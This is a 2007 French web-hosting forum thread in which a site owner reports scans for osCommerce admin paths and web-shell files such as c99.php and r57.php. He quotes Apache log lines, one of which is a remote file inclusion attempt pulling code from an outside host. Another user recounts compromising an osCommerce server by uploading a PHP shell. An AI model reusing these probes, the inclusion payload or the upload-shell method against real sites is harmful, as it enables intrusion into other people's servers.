Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1691 connectés 

  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  Tentative hacking sur fichiers oscommerce

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Tentative hacking sur fichiers oscommerce

n°327577
grosbin
OR die;
Posté le 14-11-2007 à 00:11:07  profilanswer
 

Bonsoir

 

J'ai eu des tentatives de hacking de "83.143.19.240" ce soir, près de 400 essais infructueux, générant autant d'erreurs 404
J'en ai averti son hébergeur (CTN1) pour éviter des suites .. la traceroute ne mêne pas plus loin

 

Je n'héberge pas d'oscommerce mais je trouve cela assez préjudiciable et énervant que des gosses s'amusent à rechercher des failles de sécurité partout où elles ne sont pas ( du moins j'en suis convaincu )

 

Votre expérience ? Mauvais présage ou juste un petit vent ?

 

type de fichiers :
oscommerce1/admin/c1000.php
onlineshop/admin/c100.php
shop/admin/export.php
shop1/admin/r57.php
catalog/admin/c99.php
catalog1/admin/shell.php

 

J'en conclus qu'il s'agit de failles générales ces fichiers
une petite recherche google amène rapidement à des backdoors trojan directement détectés par norton, sur page php mise en cache, joli


Message édité par grosbin le 14-11-2007 à 00:19:55

---------------
Photos Panoramiques Montagnes Haute Savoie
mood
Publicité
Posté le 14-11-2007 à 00:11:07  profilanswer
 

n°327584
Manaloup
Posté le 14-11-2007 à 07:05:06  profilanswer
 

[:totoz]  
 
non, franchement, les logs apache, on en a tous des kilometres, et on meurt pas.  :o

n°327587
grosbin
OR die;
Posté le 14-11-2007 à 08:40:00  profilanswer
 

Ok, ça commence comme ça :
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /catalog/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:57 +0100] "GET /shop/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:16 +0100] "GET /html/phpkit/include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:32 +0100] "GET /rss.php?sitemap=http://www.power-racing-online.de/pro/pro/content/images/conf? HTTP/1.1" 200 47895 portail-patrimoine.com "-" "Mozilla/5.0" "-"


Message édité par grosbin le 14-11-2007 à 08:46:23

---------------
Photos Panoramiques Montagnes Haute Savoie
n°328605
Berceker U​nited
PSN : berceker_united
Posté le 20-11-2007 à 15:32:39  profilanswer
 

Pour avoir travailler sur OSCommerce. Cette application n'est pas du tout sécurisé. Donc il est normal que certain font des attaques massif sur cette application. Donc il faut pas s'étonner de cela.

n°328612
grosbin
OR die;
Posté le 20-11-2007 à 15:51:52  profilanswer
 

Perso j'ai toujours préféré créer des application personnelles ces tentatives m'ont bien fait rire :)


---------------
Photos Panoramiques Montagnes Haute Savoie
n°328613
Berceker U​nited
PSN : berceker_united
Posté le 20-11-2007 à 15:54:46  profilanswer
 

grosbin a écrit :

Perso j'ai toujours préféré créer des application personnelles ces tentatives m'ont bien fait rire :)


En effet, c'est un risque d'avoir une application populaire sans le mettre à l'epreuve. PhpBb en est l'exemple parfait.  
Personnellement, j'ai réussi à hacker une machine avec oscommerce. Il y a un module permettant d'uploader n'importe quel fichier. Donc j'ai pu uploader un fichier php avec un simple script permettant d'executer n'importe quel code php via la commande system.

n°328614
grosbin
OR die;
Posté le 20-11-2007 à 16:00:38  profilanswer
 

Sympa comme faille, je donne la liste de sites fait via OsCommerce et phpBB directement ?


---------------
Photos Panoramiques Montagnes Haute Savoie
n°328631
Wolfman
Lobo'tomizado
Posté le 20-11-2007 à 17:58:30  profilanswer
 

Non mais n'importe quoi...


Aller à :
  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  Tentative hacking sur fichiers oscommerce

 

Sujets relatifs
noms des fichiers partiels sur FTP[RESOLU] Partage de fichiers en Wifi
partage de fichiers[urgent, mon site: hacké] comment lire des fichiers acess_log ?
Réseau local - Internet partagé mais pas les fichiersProbléme telechargement : fichiers corrompus
Envoi impossible de mes fichiers sur le réseauHébergement de fichiers & création d'un FTP sécurisé pr téléchargement
partage de fichiers entre mac et pc et vice et versaPatage fichiers entre 2 pc en local visible sur internet?
Plus de sujets relatifs à : Tentative hacking sur fichiers oscommerce


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR